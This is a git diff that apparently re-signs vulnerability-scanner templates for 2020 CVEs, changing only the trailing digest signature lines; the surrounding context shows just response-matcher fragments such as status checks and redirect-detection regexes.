4a0a00473045022100eaaaae2b3fe1bc4a2f2e207b1186e6d441842506ea615179e40d8b993f96436f022039df49b157d9f30759e5d25af817bb6e6395c56d210814410213e4e6b6697db9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010603459c2e14256ec319379898c9ea32f31d22e6e9fd998f80ab36420c4224402204b58caa678057aed9d04b38352c90d4c2926aa7cb621a82dddffb8462d1fab41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index 8e66ece6f0..25e0f04b91 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ac6dc934c8fa1e8fc055bace785564fd1059344bfc62e1813a69e4456f1f2d4022100aa3cd7ba3eaa559de71b431812f927108fc69fa375bea0891ff3c729c4b64f48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012ecfbdba8d16719dc7e960231aa3c297036266d058c7c9fc8f3b007480c9530022100a0b95f27a8e7967b747db19aa3a1294d945aac4a3586cad5b3e2527334e4cbcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 5d28634640..cf7d547210 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009c6847a5e853e7862ef13765aa884bf90f4694a3c7beac424f9ec2c4e3093c41022100b1df771c7b291d555828fef1286c62785e730cab881f1960149b4a843ac1317b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204bae7c90ae5c55d92a92908965fd3bbb4e40209aeb2b826a633b569c972ddb17022004da97dd48aa1fa01baeeb1aff87b1bc8e3d853fd435679c562f94c3406bfbe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index 058e401921..510d8368e3 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022027874136864d6a9514a295af0cefa39adaed8cc47c13d96bac228922282196fb0221009a1b174f0ffc7aed607f32e952887e3cbab8b5312430d4f9b6eabea6a2652ed1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008dfa7a4d6020faa887de95af9e2bf753c83272bce38621e20458ced0b0999d15022100d88c738364878eeb4389898a6be0e8078f007265c4c649de7029959c804082be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index a1aca44fc0..f3bf88843c 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022055fc4632dd41c5e64c90729f9708620798ef470a177c2de8b90cefce68aa19a30220574843c0664ddd38b5c38bfd98c309a3fbc923d08bb55d7125d92e05042e47aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202810d38eca2db75bc4c43b28dc361d626f957f1c98d6afc36e59d6f4593d770102200527e5476b87920b8a1a0af43f7acd34dcae98d267f8ab22739fb9542b4378fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index e427cc0719..043c8f6209 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ba99d6c3c1b35415a29b07605d8715164e0d24a909bd5d92490d24e135b80b0b022100e138b7e6428ded4eeee310653ff9d3467beda38d2208fa31ebe2d651dee14eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205bbfe9e1fff55c29b383609a112fcd1f14fdabbd51117085aefdc839317b2e80022006b01954505fcc9d2bd2ae3779d6d39d0e692ec9d79a95af1a520c079fb6a794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index f8a14a53ac..5546917b8a 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -42,4 +42,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502207a990c223869ea534afb11dcb5ee30b32a092c96504f702a4c609634602c7107022100aabc1e85ae1b8868b3f3affb647cce1e5b5f85548dbd29e9abb1da949102ba43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc2394653a151aa954095a50e96616ff9125791e698b84b3033759ba8bb524c0022100ecfec8da6e1940a5d5092d9c4f799557736212bef2724b4b2a3e8bf1721d67cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index e5deffd637..848778bd28 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f6af203eafa61520f456e34431ad08278be23262ed4ae0d76c6cfcd5179ae2e202205845c8a2ee3e08dbc47c76decf7fb3355c00c23d0ffb7a81cf87d4cbb19303ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206dcdcf2a0fe7f4a7901d37d6e45349ec08cbe1c5e149a69c0f5460f1de76b1e502203b3778862b0ef524d7aa9e6bb24b9f0f6d15754dbae7b51bd037901f919d750a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 81f2195e88..0e6c8904c3 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4a0a004730450220342d2c0eeb685d37a874d9b8fda79e0ca51067aa4ebd6b01eda7a70003cde007022100d0adab04aeaf98d9a48fe5e988bdff39b16295587f0e9b479ff0ee0cef63745b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204eafdb38f5d2d7cce18d8d570616b23acc1d01cc27f9126ec822a5e3dc8d7918022100ef91bef6dd3c245f03142b9d7c0994538bfe34344bb2af6b27646b0e00ce1687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index d321cfa650..57b6027709 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -68,4 +68,4 @@ http: regex: - '"url":"([a-z:/0-9A-Z]+)"' part: body -# digest: 4a0a00473045022021b6939d7c4f18670f5cfbecf32c9400a0ac40797210b7923b1482ee03d5bd7f022100d3e65ba752e30627bb4863fb86f4f76bf9243584e945797fb814a8b3bcf66919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e039e6f57b95460653094da4937229e3699661b22dfdd80f841e0fea091a6005022046863ad39e899fd0fbf1008b4344137c0779cbe9a0695cd2c4ef920d3cb53ef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 24f8c3c185..eff4accdb2 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207f02ce103c843033fcd0dd39bee5dad70ceb9e191712097646564dc114484d7902202c6318b8db1435ad9b63f45973a1f98d6968ebfdd30a61f06e77574baba5584e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c630d8eb251f12eef66c01e69691d80d23f3c19915634c0ebdfdf18f1b6a954f02207c83f4b945d803a515db82c4de15654a72e39e1485ae17269040ce25b3368abf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 8bde388e41..563a6aea87 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/javascript")' - 'contains(body, "$(document).ready(function()")' condition: and -# digest: 4a0a00473045022040f98bb17cb9dd9f543c8f2a14720c7f926c37a4822e9727295abb4bd8b955aa022100c62613f04ac8afcfd750afc1188d0f3f04a2461b90b206d23c4243070659aedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf4f7ac39414a286782cc1465b2e846928bf6384fd900c4b102cef03995c8496022013ce04ef0b306d3248491918201ad410693f3e67d90d2b836a6faf942e301aa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 9c279b6f1d..8e5b0394cc 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046bdbb9f7fea509f6974aef34cae17d1fb226ccac0e190ad7b74209206912f90022100b5fcf6b2c1d8e9091c7993b89cfb4807fd752152b50bec57840f5b25e2a1526e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0a3bd8cc0758c70f852f18748f6fcf9a7cb43d3c339f896caedfb9fd1aba0e9022100db5e8d85a482676d76ccf0ed34b34a258cc4021d7c79b75133f8a250f76542d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 18eecc9895..db184e8204 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e8f3ad83a505b658c3589c8e9f58b16079762f2fa09ff381e60d5674d647682022100a0333025e269f84fba3412ff25616db725b8c77ee8d7bfd724b84838bf009abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa0cedce737c4a60e3a1f8c125bdf6e0b64e32715758248531af6ade44763703022023e63a805641220d7f1d7508839d384fc5dbb361efc8059271bcffbd8eda6e6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index c8536d75dc..4212dd875a 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201b62f1d5a2608dfc99538aa5d5c6cbf107380194d132d5de236747d1f1f9d4b1022100dac2d3f5f1f33cc561551689bae39f6f952be69eac0104f257b5377ac189fa47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e1d33e39434a95c66a72423f9d56ffefb9c9ab0149479655d1fffbed2d1d070102210087e18d7a671eb2175181436334eeb9a11eee5d08516d3181afc89392cae2252a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index 687f0d2eb3..8496846e45 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200dff2f5d030b933dd091c1cc5d5cc7bc41bb0835f68632b19bb5ccf81c28a54c022100af3413a3f71258ca6527c452fcc6347aed1f04b206b65d670b39f9ab668536bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220376233aa3d60f905326b18aa647bc3402f6c58f86069a0162d2ef0fc88f05b150220592e31cae3cbfd9039006d865a9346aafb9e5008ec11162730dd27a708228c40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index 8977168602..ff6efdaa32 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee09db1547c9925f293f0463f88b484cddfa389398144842302ca857f22c49b9022100e448a84faecb3de55840bac9ed9d2ef82a2148cb20c7ab2009853c094bc8b232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c984b4120b996bbef0cf8716b9ead26900e8d96ec06a86c1f7663b2a33ce8f6022025bd3891452811bcea356711b5fbeb5b777ff4b1ab4b6c1f7d9b001b3fe7663b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 3a16c33146..1f8261e587 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033b1824b2099506d33ae152e8f6b871edcc310cf7e1bf0812930027945ee9f0f02210085421718026b61ada4ae13ce6f76fea388bedf1822f4b1c618df461484ac34e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fbca8197710376066cbfdf1b153b10c2544cc93d0305c2e8d46e8a9e735c175502202a376c513397a3f0af050ce7176553a54fbf8848b6373c2c05f91250d1aacfbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 4dc5e625cc..0148f407cf 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009dba018280edee240f269edfa1b4bcd0fec70e21842c23acb8f021c449dcf1aa022100be434604211e51a99ffc9878469c3096440bb73812008576a79a3647b6381665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec7ec7c827f691124e86f9d12e8a2953dbb6996851f1ea327c97a5255c0ccb8902210084a8006a75246356bf554e838ec99c2010d253176db50753dd51242829b60120:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 73f440dec6..786452b790 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220785fff84f1ba734fc2b1d1b2286715afd8590a459acdea1a9c1da486d05800c10220115db2a1fb0e380d14eb4d2cf43edb4f3dbafcab6d12973021b10eb69952605f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220520def47cf41d39db9764de4e29118886332fbb7ac7c1e66053e66ba8cecdc4002204011cfb0b12f6f2217dd63b478e1bdfc00e75ab3a38d1b9842180c23de86361a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 101e15d16a..0d9cd257c1 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -70,4 +70,4 @@ http: - '"execution_date":"([0-9-A-Z:+]+)"' internal: true part: body -# digest: 4a0a004730450220441da54a8a0a89a0e28a9a26a7fc752d53efca83406dba40339f6c9ce40d928d022100f3031c6e8c475b4a873d73d095e066128ef126c3c7aa9cf473df34f7ba5a2f6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec5561e5efb8b2c33536dee5f80cd1dc04b2f2f8d911d41f61fb6510cfaa00cc022078d5beb2e8a882b763c26450a112c6198d39f072c8cc97bada8e718b4098c8db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index a04b05015c..791f1581fc 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022016df2511df9587d2e1a21d59a71e3598c4f666acb51d03d55d3877ee6e3976040220787814d8c0cecd08ab442e0a8d29b441bac92c91492a482328322906b431ac95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f65493a09dd0f9ea2ea15ecf4b644afff1b36eecbe49962e13e6fdcb0a592290221008af849f7ec11cfeee9b4c0aceb55bd0574f4c22f435106f786807de0a4d6a4ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 37371082c8..4e68271ed6 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100db708e082a8ba3d59091821632d7f2241b495b3932aebc1de6d324cc76bdbcd9022100984ecb6f768fc8d248166e2f3916daa1a37999edc2146bbb3ba81da8931397cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c4cb19a5b591246f4751759ed249ea4526a7dbd298b8ce44acd57ec4a092ef2022017775560f420bcf3aae62045ccb383458c9db155a066649a99634a7d6ab4b808:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index 4e1062166a..a9f496129d 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -61,4 +61,4 @@ http: - "(?m)/cachestart/.*/jquery/" internal: true part: body -# digest: 490a0046304402200fc5ad9bdb1cc7520cf23bdb7395e0d52813c4184fa6a1b953bf69abf71b04a602207241ce6f30a6867e7c54ad6c3c2b7f7d2baf83ec792ce0c9e0b0a1ae5bd4243e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0e377e1afe6fdc3daf7edc6c70d824f0a54efeb4eb6d89b1bfa01196392a03602203cbcc8aeb298a562503efbcd3a2ff63b4182f879764eb4c3534f289543a517ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12124.yaml b/http/cves/2020/CVE-2020-12124.yaml index 4c41b1da66..54d260aab0 100644 --- a/http/cves/2020/CVE-2020-12124.yaml +++ b/http/cves/2020/CVE-2020-12124.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022013b21c005e3c657c433da224d005da53b149eeb80dfd4a028acd677b578ee5b6022054d78001a87409fc8d1a6988d3013a2efcf687ac9dd00c898b55d79cecbe548e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220795152aa32a35e7fbe4358c91ef9a136a0c2f45a24ea115ee6479ad52e2b2618022028ae4d2a2ed3350078252fa7da5ca698e60cd09022b6563061613a515bdc94fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 6706323876..e675e097b6 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dffbff0cc3444989ae4c3286f2188aabc64aed833325784119cb5011f1a954ba022100a340bd327ffe1705d7ab2e5a234fb95df02461a432dbbafbcf937d1d7da6f52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041fc4a93343cc62354b57374ec45f7cd5a84e59af1c642d5fba35345c34a235302203015c1b23e2792b32c79b0b38c69d806398122e34347e933371b36303a90936d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index b07403baa8..2ef7a5398f 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and -# digest: 490a0046304402203df7f7a1fafc6740fbc98163bb2959e9bd581ba8ddfd68573ca0af9a64f081ab02202b23a11ef0e6910123ef3657ed3d2374c3748e4f25a59b1d9d7f2e20b40dd381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a5d46e1a75e95843239ba55abc32a04e3e41c77f5ebad433590c4a4f76dbca6b022100c8e26649d9eebb4f0d5e297ea0b0d9275c73433afc8236006fcc7fd45d250b64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml index fcd1884b16..3c8e1872fd 100644 --- a/http/cves/2020/CVE-2020-12259.yaml +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and -# digest: 4a0a004730450221008538b08ecf8b93aacaac1be17c9980fbd0271e09e3a6e8cc79cfa36012a6d45d02203407d4ecb1e8ce517abd06804bf82b38a837a545c09169a361bbf6dc879e332a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e9084da67e3006f0387cb9636665ca433dd03cdd88a6792b914aced10d7feee022100f0b9a95672eb658a37cc5b7d5cd5585fa45c9e935c96261f9f805e03a2761a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index bb9a8edcc2..dc8fc74848 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d6f70c837b7c35ddacae603e0c1e3daa72b7f9d47c89a8c75302c0c8ed6e58d9022013c29b988bbbd1e577d673ae7d7e7f5afcb4c3660336ac45125a6db251230793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c3ed4c33c607da7e95a503d9f74d3faa7e79e2803afc11350dc9302994de26c0220286df5517488e25a05d7072e07a17a439242b6ac2f012cc35d48207d473d3676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index e2af8fc0b1..b15acb6d9e 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -47,4 +47,4 @@ http: - type: word words: - "vbulletinrce" -# digest: 4b0a00483046022100dd5074caccc4bc33e801e2c155340a006861f84c7b9080cd7c472e2e80fe4689022100c7a4fa68dacccc39599985db84023c514f3e71b07dfa295da29f38998e823d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220384e4b7f73e12c09a9104d50eec11bdc5c9561667873cc3e5db56d929a34b1d80221008c6087cb158ea59018cda2a63fa5ccf7106e349817823c85d91af27b2ae8ab95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 640c6ca27c..fbabfbe30e 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d359f7dda8bb47704e25df9f6ccae4b6c5ae50d87a2f8d96862170e8a3fae74b022100cc9091e18385d3d1fe499c692c8b9095062aaa9ea0f09ddb06e82dede501eb36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b225f0187a717218d847a35667f4ff5d428a737cab684bf9de67b2ca0baadfc0221009b3f8d05d5e46a2c3ea0a47cb90996367471d4fd0a11e620afad2fcf1cb40259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 883a1ca735..2084b341c2 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502206f176277eec35ef135b67c205d1cdacbf6a6d6a914b0330fc921447e4d77f10a022100d548e0e86bb67accdbea62a2cb11ff6fdfd956cb47edb0909e50b0bb2324b033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206d5139608b72b6f1bc8113be66f7f9ef151af099ff74bd9a595fbe88734f52ae022100e4b539eca28305c2bfd5fa8b99eaa4c9f56de7cfc1103aa3c2acba9d4ebcf7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index b476eca5c0..d69482800d 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205aa5e4fc4a2fc1a974f36ab4c73ca7f8d970a1a6bd7e14394f238fa34179b721022061838c49e3fa2d0486bfc7a85f72858cbe25daf49758350e33522632ea43a507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cfd0feb375bf270992992aff4bfce7cb1c16083492ec7dda8a3d92853e94e61f022003ee91334e3781da2a8be1d8bad718327c570093b1e428e9ba43416381e46b97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index ba0ef6dbf0..021127a62c 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008c62562d86e9062675832a60abae347f5564380cd4d1f3143a04618fc023ca9a022100c69d9b44376226c036805afae776400ac22ff3adc49ae438eefea5c81b5aac9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c3a8dc44a99fe2867c19eea945150fb1894eb9235112ddf613bb77aabc8a3f8022100d55021421a7e4d24d6f8b449f29dac9b65a9165d6223b22ce1301e90ccdbfe9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 4400abd5e1..0f7eb19754 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022027c5f2643bd4cd615440112890d0d23c6b5ac5613534bf20e9b6c3f6e67fdac90220773833d83834dbacee963a6c0ea63557e73c73e473d68647ce026eb13c287f16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205300c082ee82da57fd2dfd61a0dd103c9313fde822a16acdc768269bac9848350220414dbe60e7d7cd8516684716cdf6ef8539473b971dbea94b7aa27ae9763526e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 539fe48087..030220caea 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205b9bd2aa77748627d7df56b1f9ddb380e47285274318cb1a472d118ac7ea5dab022100e2b67b3e80048d92b7de1e74b9a632e18562312f42d046e47dde1538b01001e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f29320d2392721f52b8fc82f127b190c169028bbbcf1719d0e8b6a5b0997f6db02200de0fe74bc47b582d91beddf16f7fbea0a48d9cc52567ead016ae0b9ac1a5ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 1f48e0ba99..99a739faf3 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -57,4 +57,4 @@ http: - 'status_code==200' - 'contains(header,"text/html")' condition: and -# digest: 